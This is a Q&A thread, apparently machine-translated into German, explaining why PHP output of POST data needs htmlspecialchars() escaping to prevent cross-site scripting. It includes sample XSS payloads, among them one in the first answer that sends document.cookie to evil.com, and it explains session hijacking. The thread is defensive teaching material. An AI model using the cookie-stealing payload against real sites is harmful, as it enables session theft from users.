Ist so viel Entkommen notwendig?

Question

Ich war auf der Suche auf der php.net manual und es hatte diese Codezeile:

Hi <?php echo htmlspecialchars($_POST['name']); ?>. 
You are <?php echo (int)$_POST['age']; ?> years old. 

Er sagt unter:

htmlspecialchars() stellt sicher, dass alle Zeichen, die richtig codiert, damit die Menschen in HTML-Sonder sind kann keine HTML-Tags oder Javascript in Ihre Seite einfügen.

Ist das wirklich notwendig?

Kann jemand wirklich bösartigen Code in diese eine Zeile einfügen? Worüber muss man sich Sorgen machen? Kann etwas in diese Zeile injiziert werden, um einen PHP-Code auszuführen? Sind sie nur daran gewöhnt, das zu beobachten, obwohl es in diesem Fall keine Bedrohung gibt?

Answer 1

entkommen zu sein, wenn jemand den Namen zufällig:

<script>document.write('<img src="http://www.evil.com/worm.php?'+document.cookie+'"/>');</script> 

Dann ein Wurm könnte entfesselt werden auf Ihrer Website. Im Wesentlichen ist der Wurm nur ein Skript, das den Benutzer Session-Cookie nimmt, sich anmeldet und dann bösartiges Zeug macht, das sich repliziert, wenn mehr Leute es sehen.

Answer 2

Ja, es ist notwendig. Siehe Wikipedia für Informationen auf cross-site scripting vulnerabilities.

PHP kann nicht mit XSS ausgeführt werden, aber ein Angreifer könnte einen Session-Cookie stehlen. Möglicherweise katastrophal, wenn dieser Sitzungscookie beispielsweise für einen Administrator auf einem CMS verwendet wird.

Answer 3

Es ist nicht nur für die Sicherheit. Wenn Sie beispielsweise Fred&Jen als $_POST['name'] erhalten, würde dies ein XML-Dokument ungültig machen.

Answer 4

Ja könnte jemand zum Beispiel etwas Javascript-Code injizieren, der, wenn er angezeigt würde, sie zum Beispiel zu einer anderen Seite umleiten würde (was ziemlich harmlos ist).

Beispiel:

<script type="text/javascript"> 
window.location = "http://www.google.com/" 
</script> 

den Benutzer umleiten würde googeln, wenn es geschrieben werden sollten, ohne

Answer 5

Wenn Sie nur die gleichen Posts von Benutzern drucken, können sie Ihnen oder anderen Benutzern nicht viel schaden. Es ist jedoch trotzdem nützlich, da der Benutzer ">" und "<" verwenden könnte und sie würden die Darstellung des Inhalts ruinieren.

Wenn Sie jedoch den Inhalt zeigen, den andere Benutzer einreichen, wird dies viel gefährlicher.

Benutzer kann alles von Links zu anderen Seiten zu Javascript injizieren.

Und alle Benutzer, die zu der Website kommen, die dieses Bit des von Benutzern eingereichten Inhalts anzeigt, werden zu evilsite umgeleitet.

Answer 6

PHP-Code kann nicht in dieses Feld eingefügt werden, da er nicht vom PHP-Interpreter ausgewertet wird, jedoch führt er das Potenzial für Cross-Site-Scripting ein.

Sie können dies testen, indem Sie so etwas wie dies mit:

<form action="" method="POST"> 
<input type="text" name="name"/> 
<input type="submit"/> 
</form> 

<?php 
if(isset($_POST['name'])){?> 
    Hi <?php echo htmlspecialchars($_POST['name']); ?>. 
<?php}?> 

Dann im Feld "Name", diesen Code einreichen und sehen, was passiert:

XSS

<script type="text/javascript">alert("P0WN3D");</script> 

Answer 7

Die Gefahr hier ist. Es ist Javascript-Code, den ein Angreifer mit einem XSS-Angriff ausführen würde.

für sich selbst zu sehen, die htmlspecialchars entfernen() dann schreiben Sie diese als name:

<script>alert('xss')</script> 

Sie, dass Ihre PHP-Code, wird gedruckt sehen werden und der Browser die Javascript ausführen. Die häufigsten XSS-Angriffe betreffen Webanwendungen, bei denen ein Benutzer angemeldet ist. Ein erfolgreicher XSS-Angriff könnte den Sitzungs-ID-Cookie des Opfers unter Verwendung von document.cookie lesen und dann an die Angreifer-Website senden, wo der Angreifer mit einem Session-Hijack fortfahren könnte.

Dieser Angriff ist bekannt als Reflektierende XSS. Eine schwerere Art von XSS ist ein Persistentes XSS, wo Sie zum Beispiel die Eingabe in eine Datenbank speichern, dann drucken Sie es auf Ihrer Homepage für alle Benutzer zu sehen, oder eine andere Seite. Ein persistentes XSS ist viel schädlicher, da jeder Besucher der Seite, auf dem das XSS persistiert, angegriffen werden kann, ohne den Angriff für jedes Opfer neu starten zu müssen.

Answer 8

Kann jemand tatsächlich bösartigen Code in diese eine Zeile einfügen?
Ja.